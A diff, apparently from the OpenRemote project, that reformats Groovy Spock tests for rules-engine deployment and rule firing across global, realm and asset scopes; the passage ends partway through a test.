+    globalRuleset2Id = rulesetStorageService.merge(ruleset).id
 
-        ruleset = new RealmRuleset(
+    ruleset = new RealmRuleset(
             keycloakTestSetup.realmMaster.name,
             "Some master realm demo rules",
             GROOVY,
             getClass().getResource("/org/openremote/test/rules/BasicMatchAllAssetStates.groovy").text)
-        masterRulesetId = rulesetStorageService.merge(ruleset).id
+    masterRulesetId = rulesetStorageService.merge(ruleset).id
 
-        ruleset = new RealmRuleset(
+    ruleset = new RealmRuleset(
             keycloakTestSetup.realmBuilding.name,
             "Some building realm demo rules",
             GROOVY,
             getClass().getResource("/org/openremote/test/rules/BasicMatchAllAssetStates.groovy").text)
-        realmBuildingRulesetId = rulesetStorageService.merge(ruleset).id
+    realmBuildingRulesetId = rulesetStorageService.merge(ruleset).id
 
-        ruleset = new RealmRuleset(
+    ruleset = new RealmRuleset(
             keycloakTestSetup.realmCity.name,
             "Some smartcity realm demo rules",
             GROOVY,
             getClass().getResource("/org/openremote/test/rules/BasicMatchAllAssetStates.groovy").text)
-        ruleset.setEnabled(false)
-        realmCityRulesetId = rulesetStorageService.merge(ruleset).id
+    ruleset.setEnabled(false)
+    realmCityRulesetId = rulesetStorageService.merge(ruleset).id
 
-        ruleset = new AssetRuleset(
+    ruleset = new AssetRuleset(
             managerTestSetup.apartment1Id,
             "Some apartment 1 demo rules",
             GROOVY,
             getClass().getResource("/org/openremote/test/rules/BasicMatchAllAssetStates.groovy").text)
-        ruleset.setEnabled(false)
-        apartment1RulesetId = rulesetStorageService.merge(ruleset).id
+    ruleset.setEnabled(false)
+    apartment1RulesetId = rulesetStorageService.merge(ruleset).id
 
-        ruleset = new AssetRuleset(
+    ruleset = new AssetRuleset(
             managerTestSetup.apartment2Id,
             "Some apartment 2 demo rules",
             GROOVY,
             getClass().getResource("/org/openremote/test/rules/BasicMatchAllAssetStates.groovy").text)
-        .setShowOnList(true)
-        apartment2RulesetId = rulesetStorageService.merge(ruleset).id
+            .setShowOnList(true)
+    apartment2RulesetId = rulesetStorageService.merge(ruleset).id
 
-        ruleset = new AssetRuleset(
+    ruleset = new AssetRuleset(
             managerTestSetup.apartment3Id,
             "Some apartment 3 demo rules",
             GROOVY,
             getClass().getResource("/org/openremote/test/rules/BasicMatchAllAssetStates.groovy").text)
-        apartment3RulesetId = rulesetStorageService.merge(ruleset).id
+    apartment3RulesetId = rulesetStorageService.merge(ruleset).id
+  }
+
+  @SuppressWarnings("GroovyAccessibility")
+  boolean assertEnginesReady(RulesService rulesService,
+          KeycloakTestSetup keycloakTestSetup,
+          ManagerTestSetup managerTestSetup) {
+
+    globalEngine = rulesService.globalEngine.get()
+    assert globalEngine != null
+    assert globalEngine.isRunning()
+    assert globalEngine.deployments.size() == 1
+    assert globalEngine.deployments.values().any { it ->
+      it.name == "Some global demo rules" && it.status == DEPLOYED
     }
 
-    @SuppressWarnings("GroovyAccessibility")
-    boolean assertEnginesReady(RulesService rulesService,
-                               KeycloakTestSetup keycloakTestSetup,
-                               ManagerTestSetup managerTestSetup) {
+    assert rulesService.realmEngines.size() == 2
+    masterEngine = rulesService.realmEngines.get(keycloakTestSetup.realmMaster.name)
+    assert masterEngine != null
+    assert masterEngine.isRunning()
+    assert masterEngine.deployments.size() == 1
+    assert masterEngine.deployments.values().iterator().next().name == "Some master realm demo rules"
+    assert masterEngine.deployments.values().iterator().next().status == DEPLOYED
+    realmBuildingEngine = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name)
+    assert realmBuildingEngine != null
+    assert realmBuildingEngine.isRunning()
+    assert realmBuildingEngine.deployments.size() == 1
+    assert realmBuildingEngine.deployments.values().iterator().next().name == "Some building realm demo rules"
+    assert realmBuildingEngine.deployments.values().iterator().next().status == DEPLOYED
+    def realmCityEngine = rulesService.realmEngines.get(keycloakTestSetup.realmCity.name)
+    assert realmCityEngine == null
 
-        globalEngine = rulesService.globalEngine.get()
-        assert globalEngine != null
-        assert globalEngine.isRunning()
-        assert globalEngine.deployments.size() == 1
-        assert globalEngine.deployments.values().any { it -> it.name == "Some global demo rules" && it.status == DEPLOYED }
+    assert rulesService.assetEngines.size() == 2
+    apartment1Engine = rulesService.assetEngines.get(managerTestSetup.apartment1Id)
+    assert apartment1Engine == null
+    apartment2Engine = rulesService.assetEngines.get(managerTestSetup.apartment2Id)
+    assert apartment2Engine != null
+    assert apartment2Engine.isRunning()
+    assert apartment2Engine.deployments.size() == 1
+    assert apartment2Engine.deployments.values().iterator().next().name == "Some apartment 2 demo rules"
+    assert apartment2Engine.deployments.values().iterator().next().status == DEPLOYED
+    apartment3Engine = rulesService.assetEngines.get(managerTestSetup.apartment3Id)
+    assert apartment3Engine != null
+    assert apartment3Engine.isRunning()
+    assert apartment3Engine.deployments.size() == 1
+    assert apartment3Engine.deployments.values().iterator().next().name == "Some apartment 3 demo rules"
+    assert apartment3Engine.deployments.values().iterator().next().status == DEPLOYED
 
-        assert rulesService.realmEngines.size() == 2
-        masterEngine = rulesService.realmEngines.get(keycloakTestSetup.realmMaster.name)
-        assert masterEngine != null
-        assert masterEngine.isRunning()
-        assert masterEngine.deployments.size() == 1
-        assert masterEngine.deployments.values().iterator().next().name == "Some master realm demo rules"
-        assert masterEngine.deployments.values().iterator().next().status == DEPLOYED
-        realmBuildingEngine = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name)
-        assert realmBuildingEngine != null
-        assert realmBuildingEngine.isRunning()
-        assert realmBuildingEngine.deployments.size() == 1
-        assert realmBuildingEngine.deployments.values().iterator().next().name == "Some building realm demo rules"
-        assert realmBuildingEngine.deployments.values().iterator().next().status == DEPLOYED
-        def realmCityEngine = rulesService.realmEngines.get(keycloakTestSetup.realmCity.name)
-        assert realmCityEngine == null
+    return true
+  }
 
-        assert rulesService.assetEngines.size() == 2
-        apartment1Engine = rulesService.assetEngines.get(managerTestSetup.apartment1Id)
-        assert apartment1Engine == null
-        apartment2Engine = rulesService.assetEngines.get(managerTestSetup.apartment2Id)
-        assert apartment2Engine != null
-        assert apartment2Engine.isRunning()
-        assert apartment2Engine.deployments.size() == 1
-        assert apartment2Engine.deployments.values().iterator().next().name == "Some apartment 2 demo rules"
-        assert apartment2Engine.deployments.values().iterator().next().status == DEPLOYED
-        apartment3Engine = rulesService.assetEngines.get(managerTestSetup.apartment3Id)
-        assert apartment3Engine != null
-        assert apartment3Engine.isRunning()
-        assert apartment3Engine.deployments.size() == 1
-        assert apartment3Engine.deployments.values().iterator().next().name == "Some apartment 3 demo rules"
-        assert apartment3Engine.deployments.values().iterator().next().status == DEPLOYED
+  void resetRulesFired(RulesEngine... engine) {
+    // Remove all named facts (those are the only ones inserted by basic test rules)
+    Collection<RulesEngine> engines = [globalEngine, masterEngine, realmBuildingEngine, apartment2Engine, apartment3Engine]
+    engines.addAll(engine)
+    engines.forEach({ e ->
+      e.facts.namedFacts.keySet().forEach({ factName ->
+        e.facts.remove(factName)
+      })
+    })
+  }
 
-        return true
-    }
+  void assertNoRulesFired(RulesEngine... engine) {
+    Collection<RulesEngine> engines = [globalEngine, masterEngine, realmBuildingEngine, apartment2Engine, apartment3Engine]
+    engines.addAll(engine)
+    engines.forEach({ e ->
+      assert e.facts.namedFacts.size() == 0
+    })
+  }
 
-    void resetRulesFired(RulesEngine... engine) {
-        // Remove all named facts (those are the only ones inserted by basic test rules)
-        Collection<RulesEngine> engines = [globalEngine, masterEngine, realmBuildingEngine, apartment2Engine, apartment3Engine]
-        engines.addAll(engine)
-        engines.forEach({ e ->
-            e.facts.namedFacts.keySet().forEach({ factName ->
-                e.facts.remove(factName)
-            })
-        })
-    }
+  static void assertRulesFired(RulesEngine engine, int fired) {
+    assert engine.facts.namedFacts.keySet().size() == fired
+  }
 
-    void assertNoRulesFired(RulesEngine... engine) {
-        Collection<RulesEngine> engines = [globalEngine, masterEngine, realmBuildingEngine, apartment2Engine, apartment3Engine]
-        engines.addAll(engine)
-        engines.forEach({ e ->
-            assert e.facts.namedFacts.size() == 0
-        })
-    }
-
-    static void assertRulesFired(RulesEngine engine, int fired) {
-        assert engine.facts.namedFacts.keySet().size() == fired
-    }
-
-    static void assertRulesFired(RulesEngine engine, Collection<String> facts) {
-        engine.facts.namedFacts.keySet().containsAll(facts)
-    }
+  static void assertRulesFired(RulesEngine engine, Collection<String> facts) {
+    engine.facts.namedFacts.keySet().containsAll(facts)
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/rules/BasicRulesProcessingTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/rules/BasicRulesProcessingTest.groovy
@@ -48,328 +48,341 @@ import static org.openremote.test.rules.BasicRulesImport.assertRulesFired
 
 class BasicRulesProcessingTest extends Specification implements ManagerContainerTrait {
 
-    def "Check firing when deploying a new ruleset"() {
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+  def "Check firing when deploying a new ruleset"() {
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
 
-        and: "the container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def rulesService = container.getService(RulesService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
+    and: "the container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def rulesService = container.getService(RulesService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
 
-        and: "some test rulesets have been imported"
-        def rulesImport = new BasicRulesImport(rulesetStorageService, keycloakTestSetup, managerTestSetup)
+    and: "some test rulesets have been imported"
+    def rulesImport = new BasicRulesImport(rulesetStorageService, keycloakTestSetup, managerTestSetup)
 
-        expect: "the rules engines to be ready"
-        conditions.eventually {
-            assert rulesImport.assertEnginesReady(rulesService, keycloakTestSetup, managerTestSetup)
-        }
+    expect: "the rules engines to be ready"
+    conditions.eventually {
+      assert rulesImport.assertEnginesReady(rulesService, keycloakTestSetup, managerTestSetup)
+    }
 
-        when: "a LHS filtering test rule definition is loaded into the Smart Building asset"
-        def assetRuleset = new AssetRuleset(
+    when: "a LHS filtering test rule definition is loaded into the Smart Building asset"
+    def assetRuleset = new AssetRuleset(
             managerTestSetup.smartBuildingId,
             "Some Smart Building asset rules",
             Ruleset.Lang.GROOVY,
             getClass().getResource("/org/openremote/test/rules/BasicSmartHomeMatchAllAssetStates.groovy").text)
-        rulesetStorageService.merge(assetRuleset)
-        RulesEngine smartHomeEngine = null
+    rulesetStorageService.merge(assetRuleset)
+    RulesEngine smartHomeEngine = null
 
-        then: "the Smart Building rule engine should have ben created, loaded the new rule definition and facts and started"
-        conditions.eventually {
-            smartHomeEngine = rulesService.assetEngines.get(managerTestSetup.smartBuildingId)
-            assert smartHomeEngine != null
-            assert smartHomeEngine.isRunning()
-            assert smartHomeEngine.deployments.size() == 1
-            assert smartHomeEngine.deployments.values().any({
-                it.name == "Some Smart Building asset rules" && it.status == DEPLOYED
-            })
-        }
-
-        and: "the new rule engine is fully initialised"
-        conditions.eventually {
-            assert smartHomeEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_BUILDING
-            assertRulesFired(rulesImport.globalEngine, 1)
-            assertRulesFired(rulesImport.globalEngine, ["All"])
-            assertRulesFired(rulesImport.realmBuildingEngine, 1)
-            assertRulesFired(rulesImport.realmBuildingEngine, ["All"])
-            assertRulesFired(rulesImport.apartment2Engine, 1)
-            assertRulesFired(rulesImport.apartment2Engine, ["All"])
-            assertRulesFired(rulesImport.apartment3Engine, 0)
-            assertRulesFired(smartHomeEngine, 7)
-            assertRulesFired(smartHomeEngine, ["Living Room All", "Kitchen All", "Kitchen Number Attributes", "Asset Type Room", "Boolean attributes", "String attributes", "Number value types"])
-        }
-
-        when: "an attribute event occurs"
-        rulesImport.resetRulesFired(smartHomeEngine)
-        def apartment2LivingRoomPresenceDetectedChange = new AttributeEvent(
-            managerTestSetup.apartment2LivingroomId, "presenceDetected", true
-        )
-        assetProcessingService.sendAttributeEvent(apartment2LivingRoomPresenceDetectedChange)
-
-        then: "the engines in scope should have fired"
-        conditions.eventually {
-            assertRulesFired(rulesImport.globalEngine, 1)
-            assertRulesFired(rulesImport.globalEngine, ["All"])
-            assertRulesFired(rulesImport.realmBuildingEngine, 1)
-            assertRulesFired(rulesImport.realmBuildingEngine, ["All"])
-            assertRulesFired(rulesImport.apartment2Engine, 1)
-            assertRulesFired(rulesImport.apartment2Engine, ["All"])
-            assertRulesFired(rulesImport.apartment3Engine, 0)
-            assertRulesFired(smartHomeEngine, 7)
-            assertRulesFired(smartHomeEngine, ["Living Room All", "Kitchen All", "Kitchen Number Attributes", "Asset Type Room", "Boolean Attributes", "String attributes", "Number value types"])
-        }
-
+    then: "the Smart Building rule engine should have ben created, loaded the new rule definition and facts and started"
+    conditions.eventually {
+      smartHomeEngine = rulesService.assetEngines.get(managerTestSetup.smartBuildingId)
+      assert smartHomeEngine != null
+      assert smartHomeEngine.isRunning()
+      assert smartHomeEngine.deployments.size() == 1
+      assert smartHomeEngine.deployments.values().any({
+        it.name == "Some Smart Building asset rules" && it.status == DEPLOYED
+      })
     }
 
-    def "Handle attribute event with no meta, asset create, update, delete"() {
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 15, delay: 0.2)
+    and: "the new rule engine is fully initialised"
+    conditions.eventually {
+      assert smartHomeEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_BUILDING
+      assertRulesFired(rulesImport.globalEngine, 1)
+      assertRulesFired(rulesImport.globalEngine, ["All"])
+      assertRulesFired(rulesImport.realmBuildingEngine, 1)
+      assertRulesFired(rulesImport.realmBuildingEngine, ["All"])
+      assertRulesFired(rulesImport.apartment2Engine, 1)
+      assertRulesFired(rulesImport.apartment2Engine, ["All"])
+      assertRulesFired(rulesImport.apartment3Engine, 0)
+      assertRulesFired(smartHomeEngine, 7)
+      assertRulesFired(smartHomeEngine, [
+        "Living Room All",
+        "Kitchen All",
+        "Kitchen Number Attributes",
+        "Asset Type Room",
+        "Boolean attributes",
+        "String attributes",
+        "Number value types"
+      ])
+    }
 
-        and: "the container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def rulesService = container.getService(RulesService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
+    when: "an attribute event occurs"
+    rulesImport.resetRulesFired(smartHomeEngine)
+    def apartment2LivingRoomPresenceDetectedChange = new AttributeEvent(
+            managerTestSetup.apartment2LivingroomId, "presenceDetected", true
+            )
+    assetProcessingService.sendAttributeEvent(apartment2LivingRoomPresenceDetectedChange)
 
-        and: "some test rulesets have been imported"
-        def rulesImport = new BasicRulesImport(rulesetStorageService, keycloakTestSetup, managerTestSetup)
+    then: "the engines in scope should have fired"
+    conditions.eventually {
+      assertRulesFired(rulesImport.globalEngine, 1)
+      assertRulesFired(rulesImport.globalEngine, ["All"])
+      assertRulesFired(rulesImport.realmBuildingEngine, 1)
+      assertRulesFired(rulesImport.realmBuildingEngine, ["All"])
+      assertRulesFired(rulesImport.apartment2Engine, 1)
+      assertRulesFired(rulesImport.apartment2Engine, ["All"])
+      assertRulesFired(rulesImport.apartment3Engine, 0)
+      assertRulesFired(smartHomeEngine, 7)
+      assertRulesFired(smartHomeEngine, [
+        "Living Room All",
+        "Kitchen All",
+        "Kitchen Number Attributes",
+        "Asset Type Room",
+        "Boolean Attributes",
+        "String attributes",
+        "Number value types"
+      ])
+    }
+  }
 
-        expect: "the rules engines to be ready"
-        conditions.eventually {
-            assert rulesImport.assertEnginesReady(rulesService, keycloakTestSetup, managerTestSetup)
-        }
+  def "Handle attribute event with no meta, asset create, update, delete"() {
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 15, delay: 0.2)
 
-        when: "a Kitchen room asset is inserted into apartment that contains a RULE_STATE = true meta flag"
-        def apartment2 = assetStorageService.find(managerTestSetup.apartment2Id)
-        def asset = new RoomAsset("Kitchen")
+    and: "the container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def rulesService = container.getService(RulesService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+
+    and: "some test rulesets have been imported"
+    def rulesImport = new BasicRulesImport(rulesetStorageService, keycloakTestSetup, managerTestSetup)
+
+    expect: "the rules engines to be ready"
+    conditions.eventually {
+      assert rulesImport.assertEnginesReady(rulesService, keycloakTestSetup, managerTestSetup)
+    }
+
+    when: "a Kitchen room asset is inserted into apartment that contains a RULE_STATE = true meta flag"
+    def apartment2 = assetStorageService.find(managerTestSetup.apartment2Id)
+    def asset = new RoomAsset("Kitchen")
             .setParent(apartment2)
             .addOrReplaceAttributes(
-                new Attribute<>("testString", ValueType.TEXT, "test")
-                    .addOrReplaceMeta(
-                        new MetaItem<>(MetaItemType.RULE_STATE, true)
+            new Attribute<>("testString", ValueType.TEXT, "test")
+            .addOrReplaceMeta(
+                    new MetaItem<>(MetaItemType.RULE_STATE, true)
                     )
             )
-        asset = assetStorageService.merge(asset)
+    asset = assetStorageService.merge(asset)
 
-        then: "the rules engines should have executed at least once"
-        conditions.eventually {
-            assert rulesImport.globalEngine.lastFireTimestamp > 0
-            assert rulesImport.masterEngine.lastFireTimestamp > 0
-            assert rulesImport.realmBuildingEngine.lastFireTimestamp > 0
-            assert rulesImport.apartment2Engine.lastFireTimestamp > 0
-            assert rulesImport.apartment3Engine.lastFireTimestamp > 0
-        }
+    then: "the rules engines should have executed at least once"
+    conditions.eventually {
+      assert rulesImport.globalEngine.lastFireTimestamp> 0
+      assert rulesImport.masterEngine.lastFireTimestamp> 0
+      assert rulesImport.realmBuildingEngine.lastFireTimestamp> 0
+      assert rulesImport.apartment2Engine.lastFireTimestamp> 0
+      assert rulesImport.apartment3Engine.lastFireTimestamp> 0
+    }
 
-        then: "after a few seconds the engines in scope should have facts and rules should have fired"
-        conditions.eventually {
-            assert rulesService.attributeEvents.size() == DEMO_RULE_STATES_GLOBAL + 1
-            assert rulesImport.globalEngine.facts.assetStates.size() == DEMO_RULE_STATES_GLOBAL + 1
-            assert rulesImport.masterEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_OFFICE
-            assert rulesImport.realmBuildingEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_BUILDING + 1
-            assert rulesImport.apartment2Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_2 + 1
-            assert rulesImport.apartment3Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_3
-            assertRulesFired(rulesImport.globalEngine, 1)
-            assertRulesFired(rulesImport.globalEngine, ["All"])
-            assertRulesFired(rulesImport.masterEngine, 1)
-            assertRulesFired(rulesImport.masterEngine, ["All"])
-            assertRulesFired(rulesImport.realmBuildingEngine, 1)
-            assertRulesFired(rulesImport.realmBuildingEngine, ["All"])
-            assertRulesFired(rulesImport.apartment2Engine, 1)
-            assertRulesFired(rulesImport.apartment2Engine, ["All"])
-            assertRulesFired(rulesImport.apartment3Engine, 0)
-        }
+    then: "after a few seconds the engines in scope should have facts and rules should have fired"
+    conditions.eventually {
+      assert rulesService.attributeEvents.size() == DEMO_RULE_STATES_GLOBAL + 1
+      assert rulesImport.globalEngine.facts.assetStates.size() == DEMO_RULE_STATES_GLOBAL + 1
+      assert rulesImport.masterEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_OFFICE
+      assert rulesImport.realmBuildingEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_BUILDING + 1
+      assert rulesImport.apartment2Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_2 + 1
+      assert rulesImport.apartment3Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_3
+      assertRulesFired(rulesImport.globalEngine, 1)
+      assertRulesFired(rulesImport.globalEngine, ["All"])
+      assertRulesFired(rulesImport.masterEngine, 1)
+      assertRulesFired(rulesImport.masterEngine, ["All"])
+      assertRulesFired(rulesImport.realmBuildingEngine, 1)
+      assertRulesFired(rulesImport.realmBuildingEngine, ["All"])
+      assertRulesFired(rulesImport.apartment2Engine, 1)
+      assertRulesFired(rulesImport.apartment2Engine, ["All"])
+      assertRulesFired(rulesImport.apartment3Engine, 0)
+    }
 
-        when: "time advances"
-        advancePseudoClock(1, TimeUnit.SECONDS, container)
+    when: "time advances"
+    advancePseudoClock(1, TimeUnit.SECONDS, container)
 
-        and: "the Kitchen room asset is modified to add a new attribute but RULE_STATE = true meta is not changed"
-        def globalLastFireTimestamp = rulesImport.globalEngine.lastFireTimestamp
-        def masterLastFireTimestamp = rulesImport.masterEngine.lastFireTimestamp
-        def realmALastFireTimestamp = rulesImport.realmBuildingEngine.lastFireTimestamp
-        def apartment2LastFireTimestamp = rulesImport.apartment2Engine.lastFireTimestamp
-        def apartment3LastFireTimestamp = rulesImport.apartment3Engine.lastFireTimestamp
-        asset.addOrReplaceAttributes(
+    and: "the Kitchen room asset is modified to add a new attribute but RULE_STATE = true meta is not changed"
+    def globalLastFireTimestamp = rulesImport.globalEngine.lastFireTimestamp
+    def masterLastFireTimestamp = rulesImport.masterEngine.lastFireTimestamp
+    def realmALastFireTimestamp = rulesImport.realmBuildingEngine.lastFireTimestamp
+    def apartment2LastFireTimestamp = rulesImport.apartment2Engine.lastFireTimestamp
+    def apartment3LastFireTimestamp = rulesImport.apartment3Engine.lastFireTimestamp
+    asset.addOrReplaceAttributes(
             new Attribute<>("testString", ValueType.TEXT, "test")
-                .addOrReplaceMeta(
+            .addOrReplaceMeta(
                     new MetaItem<>(MetaItemType.RULE_STATE, true)
-                ),
+                    ),
             new Attribute<>("testInteger", ValueType.NUMBER, 0d)
-        )
-        asset = assetStorageService.merge(asset)
+            )
+    asset = assetStorageService.merge(asset)
 
-        then: "the rules engines should have executed at least one more time"
-        conditions.eventually {
-            assert rulesImport.globalEngine.lastFireTimestamp > globalLastFireTimestamp
-            assert rulesImport.masterEngine.lastFireTimestamp > masterLastFireTimestamp
-            assert rulesImport.realmBuildingEngine.lastFireTimestamp > realmALastFireTimestamp
-            assert rulesImport.apartment2Engine.lastFireTimestamp > apartment2LastFireTimestamp
-            assert rulesImport.apartment3Engine.lastFireTimestamp > apartment3LastFireTimestamp
-        }
+    then: "the rules engines should have executed at least one more time"
+    conditions.eventually {
+      assert rulesImport.globalEngine.lastFireTimestamp> globalLastFireTimestamp
+      assert rulesImport.masterEngine.lastFireTimestamp> masterLastFireTimestamp
+      assert rulesImport.realmBuildingEngine.lastFireTimestamp> realmALastFireTimestamp
+      assert rulesImport.apartment2Engine.lastFireTimestamp> apartment2LastFireTimestamp
+      assert rulesImport.apartment3Engine.lastFireTimestamp> apartment3LastFireTimestamp
+    }
 
-        then: "no rules should have fired"
-        conditions.eventually {
-            assert rulesService.attributeEvents.size() == DEMO_RULE_STATES_GLOBAL + 1
-            assert rulesImport.globalEngine.facts.assetStates.size() == DEMO_RULE_STATES_GLOBAL + 1
-            assert rulesImport.masterEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_OFFICE
-            assert rulesImport.realmBuildingEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_BUILDING + 1
-            assert rulesImport.apartment2Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_2 + 1
-            assert rulesImport.apartment3Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_3
-            assertRulesFired(rulesImport.globalEngine, 1)
-            assertRulesFired(rulesImport.masterEngine, 1)
-            assertRulesFired(rulesImport.realmBuildingEngine, 1)
-            assertRulesFired(rulesImport.apartment2Engine, 1)
-            assertRulesFired(rulesImport.apartment3Engine, 0)
-        }
+    then: "no rules should have fired"
+    conditions.eventually {
+      assert rulesService.attributeEvents.size() == DEMO_RULE_STATES_GLOBAL + 1
+      assert rulesImport.globalEngine.facts.assetStates.size() == DEMO_RULE_STATES_GLOBAL + 1
+      assert rulesImport.masterEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_OFFICE
+      assert rulesImport.realmBuildingEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_BUILDING + 1
+      assert rulesImport.apartment2Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_2 + 1
+      assert rulesImport.apartment3Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_3
+      assertRulesFired(rulesImport.globalEngine, 1)
+      assertRulesFired(rulesImport.masterEngine, 1)
+      assertRulesFired(rulesImport.realmBuildingEngine, 1)
+      assertRulesFired(rulesImport.apartment2Engine, 1)
+      assertRulesFired(rulesImport.apartment3Engine, 0)
+    }
 
-        when: "the Kitchen room asset is modified to set the RULE_STATE to false"
-        rulesImport.resetRulesFired()
-        asset.addOrReplaceAttributes(
+    when: "the Kitchen room asset is modified to set the RULE_STATE to false"
+    rulesImport.resetRulesFired()
+    asset.addOrReplaceAttributes(
             new Attribute<>("testString", ValueType.TEXT, "test")
-                .addOrReplaceMeta(
+            .addOrReplaceMeta(
                     new MetaItem<>(MetaItemType.RULE_STATE, false)
-                ),
+                    ),
             new Attribute<>("testInteger", ValueType.NUMBER, 0d)
-        )
-        asset = assetStorageService.merge(asset)
+            )
+    asset = assetStorageService.merge(asset)
 
-        then: "the facts should be removed from the rule engines and rules should have fired"
-        conditions.eventually {
-            assert rulesService.attributeEvents.size() == DEMO_RULE_STATES_GLOBAL
-            assert rulesImport.globalEngine.facts.assetStates.size() == DEMO_RULE_STATES_GLOBAL
-            assert rulesImport.masterEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_OFFICE
-            assert rulesImport.realmBuildingEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_BUILDING
-            assert rulesImport.apartment2Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_2
-            assert rulesImport.apartment3Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_3
-            assertRulesFired(rulesImport.globalEngine, 1)
-            assertRulesFired(rulesImport.globalEngine, ["All"])
-            assertRulesFired(rulesImport.realmBuildingEngine, 1)
-            assertRulesFired(rulesImport.realmBuildingEngine, ["All"])
-            assertRulesFired(rulesImport.apartment2Engine, 1)
-            assertRulesFired(rulesImport.apartment2Engine, ["All"])
-            assertRulesFired(rulesImport.apartment3Engine, 0)
-        }
+    then: "the facts should be removed from the rule engines and rules should have fired"
+    conditions.eventually {
+      assert rulesService.attributeEvents.size() == DEMO_RULE_STATES_GLOBAL
+      assert rulesImport.globalEngine.facts.assetStates.size() == DEMO_RULE_STATES_GLOBAL
+      assert rulesImport.masterEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_OFFICE
+      assert rulesImport.realmBuildingEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_BUILDING
+      assert rulesImport.apartment2Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_2
+      assert rulesImport.apartment3Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_3
+      assertRulesFired(rulesImport.globalEngine, 1)
+      assertRulesFired(rulesImport.globalEngine, ["All"])
+      assertRulesFired(rulesImport.realmBuildingEngine, 1)
+      assertRulesFired(rulesImport.realmBuildingEngine, ["All"])
+      assertRulesFired(rulesImport.apartment2Engine, 1)
+      assertRulesFired(rulesImport.apartment2Engine, ["All"])
+      assertRulesFired(rulesImport.apartment3Engine, 0)
+    }
 
-        when: "the Kitchen room asset is modified to set all attributes to RULE_STATE = true"
-        rulesImport.resetRulesFired()
-        asset.addOrReplaceAttributes(
+    when: "the Kitchen room asset is modified to set all attributes to RULE_STATE = true"
+    rulesImport.resetRulesFired()
+    asset.addOrReplaceAttributes(
             new Attribute<>("testString", ValueType.TEXT, "test")
-                .addOrReplaceMeta(
+            .addOrReplaceMeta(
                     new MetaItem<>(MetaItemType.RULE_STATE, true)
-                ),
+                    ),
             new Attribute<>("testInteger", ValueType.NUMBER, 0d)
-                .addOrReplaceMeta(
+            .addOrReplaceMeta(
                     new MetaItem<>(MetaItemType.RULE_STATE, true)
-                )
-        )
-        asset = assetStorageService.merge(asset)
+                    )
+            )
+    asset = assetStorageService.merge(asset)
 
-        then: "the facts should be added to the rule engines and rules should have fired"
-        conditions.eventually {
-            assert rulesService.attributeEvents.size() == DEMO_RULE_STATES_GLOBAL + 2
-            assert rulesImport.globalEngine.facts.assetStates.size() == DEMO_RULE_STATES_GLOBAL + 2
-            assert rulesImport.masterEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_OFFICE
-            assert rulesImport.realmBuildingEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_BUILDING + 2
-            assert rulesImport.apartment2Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_2 + 2
-            assert rulesImport.apartment3Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_3
-            assertRulesFired(rulesImport.globalEngine, 1)
-            assertRulesFired(rulesImport.globalEngine, ["All"])
